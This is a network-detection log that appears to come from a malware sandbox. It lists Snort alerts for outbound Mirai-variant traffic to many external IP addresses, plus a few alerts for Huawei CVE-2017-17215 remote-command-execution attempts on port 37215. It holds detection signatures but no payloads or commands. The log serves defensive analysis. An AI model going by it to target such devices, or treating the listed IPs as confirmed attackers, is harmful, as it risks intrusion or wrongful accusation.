    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41482 -> 95.56.17.31:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47128 -> 112.213.117.10:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34980 -> 88.198.21.248:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54178 -> 88.198.229.246:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55390 -> 112.196.118.123:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46852 -> 95.179.189.48:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41738 -> 95.217.49.244:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43212 -> 95.100.211.206:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50170 -> 95.86.73.188:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55520 -> 95.9.93.17:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52400 -> 95.100.79.93:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37178 -> 95.168.203.163:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46716 -> 95.107.144.235:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35116 -> 95.100.246.157:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56592 -> 95.131.48.101:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37284 -> 95.217.224.30:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39760 -> 112.126.71.72:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35114 -> 95.217.236.86:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46600 -> 95.97.189.182:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54852 -> 95.48.59.234:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60980 -> 95.57.131.28:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53502 -> 95.213.238.69:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59238 -> 95.171.107.174:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53412 -> 95.101.158.87:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48492 -> 95.56.128.87:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57666 -> 88.99.135.230:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47144 -> 88.233.139.242:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44912 -> 95.217.156.156:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39806 -> 95.216.159.216:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37234 -> 95.250.222.22:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37494 -> 95.128.137.161:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58408 -> 95.128.144.37:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52166 -> 95.100.13.199:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34834 -> 95.163.85.55:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44570 -> 112.80.252.253:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54508 -> 112.47.11.41:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42778 -> 88.19.69.146:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34494 -> 112.124.65.225:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40406 -> 95.100.176.53:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:45728 -> 95.100.55.131:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49132 -> 95.217.19.19:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50924 -> 95.143.177.134:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41086 -> 95.38.51.65:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59696 -> 95.181.239.10:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39164 -> 95.216.139.73:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47022 -> 95.216.221.140:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52072 -> 95.12.141.113:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37370 -> 95.100.13.104:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59330 -> 112.171.223.230:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49292 -> 112.216.162.195:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46040 -> 112.155.109.10:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53038 -> 112.74.188.110:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39216 -> 112.178.184.129:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41212 -> 95.101.249.172:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41186 -> 95.216.104.52:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35028 -> 88.198.127.245:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33166 -> 88.88.70.209:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52322 -> 88.99.203.165:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59298 -> 88.99.125.244:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39598 -> 95.100.228.190:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33342 -> 95.100.118.115:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52832 -> 95.173.164.51:80
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52504 -> 197.246.141.17:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52504 -> 197.246.141.17:37215
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49092 -> 112.173.228.226:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42918 -> 112.105.29.89:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41044 -> 112.74.44.166:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38992 -> 112.222.171.133:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54870 -> 112.125.25.233:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40802 -> 88.208.229.12:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57062 -> 88.26.248.103:80
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50032 -> 197.214.103.174:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50032 -> 197.214.103.174:37215
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40378 -> 95.165.192.206:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49804 -> 95.86.103.94:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60502 -> 95.86.119.220:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56168 -> 95.9.91.6:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44592 -> 88.221.37.53:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54716 -> 88.103.182.137:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56188 -> 95.9.91.6:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43862 -> 95.217.232.91:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42604 -> 95.100.121.120:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51530 -> 88.149.218.242:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58970 -> 88.212.236.44:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42220 -> 95.101.202.77:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47280 -> 95.100.54.15:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33970 -> 95.163.56.169:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51660 -> 95.58.73.81:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51728 -> 112.104.30.157:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56708 -> 112.196.3.89:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48894 -> 112.197.1.52:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39116 -> 112.74.62.92:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37068 -> 88.198.171.234:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41970 -> 88.210.100.182:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47698 -> 88.249.192.77:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52802 -> 95.100.66.99:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:45346 -> 95.228.168.234:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54082 -> 95.216.234.94:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58036 -> 95.216.243.184:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53448 -> 95.67.88.4:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39806 -> 95.182.121.119:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41042 -> 95.218.216.216:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33220 -> 95.101.50.4:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46860 -> 112.170.27.143:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53460 -> 112.133.19.31:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40710 -> 112.126.222.182:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46366 -> 112.125.217.158:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34424 -> 112.17.48.49:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56548 -> 95.179.192.212:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54906 -> 95.100.176.91:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55252 -> 95.101.83.26:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39922 -> 95.217.178.210:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42096 -> 95.216.26.91:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52442 -> 112.166.253.250:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55208 -> 95.211.144.79:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41642 -> 95.216.223.160:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46324 -> 95.131.147.151:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55394 -> 95.82.235.46:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50256 -> 95.217.246.97:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58486 -> 95.216.175.42:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41626 -> 95.217.66.2:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59032 -> 95.163.50.178:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51232 -> 95.0.213.69:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55204 -> 95.100.218.43:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51778 -> 95.126.76.32:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38966 -> 112.17.55.24:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38972 -> 112.17.55.24:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48426 -> 112.184.44.97:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47578 -> 88.221.149.152:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39262 -> 88.99.104.17:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42534 -> 88.99.95.120:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42658 -> 88.130.135.50:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49600 -> 88.221.248.70:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57744 -> 112.74.96.26:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39726 -> 112.140.38.75:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60852 -> 95.86.74.207:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59104 -> 88.221.154.91:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41860 -> 88.198.134.97:80
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50630 -> 197.49.98.166:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50630 -> 197.49.98.166:37215
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37432 -> 112.30.176.86:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41548 -> 95.101.227.158:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55254 -> 95.101.7.180:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33680 -> 95.101.57.214:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60332 -> 95.164.33.84:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47298 -> 95.100.0.68:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46302 -> 95.100.0.120:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33260 -> 112.171.232.7:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51818 -> 112.12.91.124:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41336 -> 95.104.244.152:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46052 -> 95.31.224.7:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46688 -> 95.86.103.164:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51824 -> 112.12.91.124:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43212 -> 95.56.126.73:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43644 -> 112.74.217.206:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51820 -> 112.12.91.124:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48296 -> 95.100.52.229:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60590 -> 95.143.177.12:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37846 -> 95.217.18.181:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49336 -> 95.163.238.166:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50512 -> 112.175.51.209:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59274 -> 88.221.180.214:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50424 -> 88.99.147.5:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:45798 -> 88.73.152.255:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50670 -> 88.148.64.103:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33036 -> 88.86.193.217:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36500 -> 112.15.44.201:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54978 -> 88.221.151.13:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58618 -> 88.218.157.224:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43080 -> 88.248.111.201:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41186 -> 95.100.81.199:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49040 -> 88.221.39.34:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33860 -> 95.57.202.93:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57324 -> 88.99.58.238:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53088 -> 88.81.149.183:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35652 -> 88.93.162.42:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49188 -> 95.131.137.242:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37460 -> 95.154.17.166:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38746 -> 95.110.197.207:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40246 -> 88.34.159.74:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48294 -> 95.58.240.216:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54478 -> 88.135.44.104:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:45568 -> 95.196.221.99:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35496 -> 95.101.176.164:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40376 -> 95.97.176.14:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47458 -> 95.217.73.36:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60752 -> 95.101.225.89:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58572 -> 95.182.152.68:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56626 -> 95.217.12.177:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:45656 -> 95.140.139.143:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41392 -> 95.181.177.141:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41196 -> 95.86.86.27:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37262 -> 95.86.64.156:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42536 -> 88.149.250.168:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55218 -> 88.99.175.18:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44726 -> 95.110.223.144:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60406 -> 112.185.241.219:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:32850 -> 95.0.133.236:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59450 -> 95.58.255.230:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:45696 -> 112.186.102.153:80
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52140
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52146
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52164
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52172
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52174
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52176
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52190
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52214
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52238
